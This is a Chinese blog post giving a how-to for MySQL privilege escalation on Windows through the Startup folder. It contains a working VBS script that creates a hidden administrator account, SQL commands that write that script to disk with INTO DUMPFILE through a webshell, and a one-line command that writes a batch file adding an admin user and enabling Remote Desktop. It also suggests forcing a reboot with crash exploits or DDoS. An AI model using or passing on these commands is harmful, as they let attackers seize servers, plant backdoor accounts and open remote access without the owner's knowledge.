MySQL提权之启动项提权——开机启动的程序,那时候启动的程序权限都是system

MySQL提权之启动项提权

原理:windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。
 

关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令!

这里有两种思路:

1. 如果  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限,那么我们可以直接将 VBS 提权脚本上传到该目录下!

VBS 提权脚本代码如下:

复制代码
1 setwsnetwork=CreateObject("WSCRIPT.NETWORK")
2 os="WinNT://"&wsnetwork.ComputerName
3 Set ob=GetObject(os)
4 Setoe=GetObject(os&"/Administrators,group")
5 Set od=ob.Create("user","secist")
6 od.SetPassword "secist.com"
7 od.SetInfo
8 Set of=GetObject(os&"/secist",user)
9 oe.add os&"/secist"
复制代码

 

将以上代码保存为 .vbs 后缀的文件上传即可!

2. 通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加。

create table secist(cmd text);

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);

insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);

insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\secist.vbs”;

 

 

 写入文件报错 修改配置文件也无法写入

 

 

 只能修改写入文件的路径

 

 

 

 

 再将生成的文件移动到自启动目录

 

 

 

成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!

温馨提示:

1.关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务!

2.上传的目录必须具备可读写的权限!

3.调用的 cmd 也必须有足够的权限!

 

参考:https://blog.csdn.net/qq_37077262/article/details/102964050

      https://www.cnblogs.com/wh4am1/p/6613759.html

 

 

MYSQL数据库提权之——开机启动项提权,并开启远程控制端口

前提:只能在windows使用

原理
利用mysql,将后门写入开机自启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql的权限要很高,至少是管理员权限甚至需要system权限)

开机启动程序上传路径
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
或者C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\(windows2003、xp、win10的路径)

过程
1.上传批处理文件1.bat到开机启动项程序上传路径
利用菜刀的数据库管理执行以下mysql命令(创建一个lp用户,将其添加到管理员组,并开启远程桌面3309)

select "net user lp 123.com /add & net localgroup administrators lp /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"


2.服务器重启时,即可自动创建一个具有管理员权限的用户lp,并且会开启3309端口,我们可以使用lp用户进行远程连接

posted @ 2022-02-05 17:18  bonelee  阅读(394)  评论(0编辑  收藏  举报